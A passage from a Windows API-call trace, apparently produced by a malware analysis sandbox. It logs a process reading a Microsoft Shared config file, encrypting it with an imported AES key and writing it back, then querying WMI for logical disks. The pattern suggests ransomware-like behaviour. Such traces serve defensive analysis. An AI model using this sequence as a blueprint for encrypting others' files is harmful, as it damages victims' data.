Shared\\GRPHFLT\\CGMIMP32.CFG", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpFilePart=0x0) returned 0x43 [0195.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0195.481] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), fInfoLevelId=0x0, lpFileInformation=0x3b6e18c | out: lpFileInformation=0x3b6e18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b)) returned 1 [0195.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0195.481] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpFilePart=0x0) returned 0x43 [0195.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0195.481] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0195.481] GetFileType (hFile=0x2f0) returned 0x1 [0195.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0195.481] GetFileType (hFile=0x2f0) returned 0x1 [0195.481] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x1a9b [0195.481] ReadFile (in: hFile=0x2f0, lpBuffer=0x3b6e394, nNumberOfBytesToRead=0x1a9b, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x3b6e394*, lpNumberOfBytesRead=0x6d8edac*=0x1a9b, lpOverlapped=0x0) returned 1 [0195.504] CloseHandle (hObject=0x2f0) returned 1 [0195.505] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0x66bbd08) returned 1 [0195.506] CryptGenRandom (in: hProv=0x66bbd08, dwLen=0x10, pbBuffer=0x3b70184 | out: pbBuffer=0x3b70184) returned 1 [0196.100] CryptImportKey (in: hProv=0x66bbd08, pbData=0x36a4624, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f9d0) returned 1 [0196.101] CryptContextAddRef (hProv=0x66bbd08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.101] CryptContextAddRef (hProv=0x66bbd08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.101] CryptDuplicateKey (in: hKey=0xb7f9d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f610) returned 1 [0196.101] CryptContextAddRef (hProv=0x66bbd08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.101] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x4, pbData=0x36a4704*=0x1, dwFlags=0x0) returned 1 [0196.101] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x1, pbData=0x36a46d0, dwFlags=0x0) returned 1 [0196.101] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36a4714*, pdwDataLen=0x6d8ed78*=0x1aa0, dwBufLen=0x1aa0 | out: pbData=0x36a4714*, pdwDataLen=0x6d8ed78*=0x1aa0) returned 1 [0196.101] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36a61d8*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x36a61d8*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0196.103] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0196.103] CryptReleaseContext (hProv=0x66bbd08, dwFlags=0x0) returned 1 [0196.103] CryptReleaseContext (hProv=0x66bbd08, dwFlags=0x0) returned 1 [0196.103] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpFilePart=0x0) returned 0x43 [0196.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0196.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0196.104] GetFileType (hFile=0x324) returned 0x1 [0196.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0196.104] GetFileType (hFile=0x324) returned 0x1 [0196.104] WriteFile (in: hFile=0x324, lpBuffer=0x36a67f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x36a67f8*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0196.106] CloseHandle (hObject=0x324) returned 1 [0196.106] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0196.106] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0196.106] CoTaskMemFree (pv=0xbed438) [0196.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0196.106] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0196.107] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0196.107] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0196.107] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.108] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x6027620) returned 0x0 [0196.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027620, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0196.108] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027620, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6030a20) returned 0x0 [0196.108] WbemDefPath:IUnknown:Release (This=0x6027620) returned 0x0 [0196.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6030a20) returned 0x0 [0196.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0196.108] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0196.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0196.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0196.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0xbe23f0) returned 0x0 [0196.108] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe23f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.108] WbemDefPath:IUnknown:Release (This=0xbe23f0) returned 0x3 [0196.109] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0196.109] CoGetContextToken (in: pToken=0x6d8ddb8 | out: pToken=0x6d8ddb8) returned 0x0 [0196.109] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0196.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0196.109] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0196.109] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x1 [0196.109] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0196.109] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0196.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6030a20) returned 0x0 [0196.109] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0196.109] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0196.109] WbemDefPath:IWbemPath:SetText (This=0x6030a20, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.109] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0196.109] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0196.124] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.124] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0196.124] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0196.124] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0196.124] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0196.124] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0196.124] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0196.124] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0196.124] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.124] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0196.124] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0196.124] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0196.124] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.125] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6027640) returned 0x0 [0196.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027640, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0196.126] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027640, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x60309b0) returned 0x0 [0196.126] WbemDefPath:IUnknown:Release (This=0x6027640) returned 0x0 [0196.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x60309b0) returned 0x0 [0196.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0196.126] WbemDefPath:IUnknown:AddRef (This=0x60309b0) returned 0x3 [0196.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0196.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0196.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0xbe2470) returned 0x0 [0196.126] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2470, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.126] WbemDefPath:IUnknown:Release (This=0xbe2470) returned 0x3 [0196.126] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0196.126] CoGetContextToken (in: pToken=0x6d8dd00 | out: pToken=0x6d8dd00) returned 0x0 [0196.126] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0196.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0196.126] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x2 [0196.126] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x1 [0196.127] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0196.127] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0196.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x60309b0) returned 0x0 [0196.127] WbemDefPath:IUnknown:AddRef (This=0x60309b0) returned 0x3 [0196.127] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x2 [0196.127] WbemDefPath:IWbemPath:SetText (This=0x60309b0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0196.127] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0196.127] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0196.127] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.127] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0196.127] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0196.127] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0196.127] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.128] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x6023ae0) returned 0x0 [0196.128] WbemLocator:IUnknown:QueryInterface (in: This=0x6023ae0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0196.128] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023ae0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x60277d0) returned 0x0 [0196.128] WbemLocator:IUnknown:Release (This=0x6023ae0) returned 0x0 [0196.128] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x60277d0) returned 0x0 [0196.128] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0196.128] WbemLocator:IUnknown:AddRef (This=0x60277d0) returned 0x3 [0196.128] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0196.128] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0196.128] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0196.128] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0196.128] CoGetContextToken (in: pToken=0x6d8dfe0 | out: pToken=0x6d8dfe0) returned 0x0 [0196.129] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0196.129] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0196.129] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x2 [0196.129] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x1 [0196.129] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0196.129] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0196.129] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: 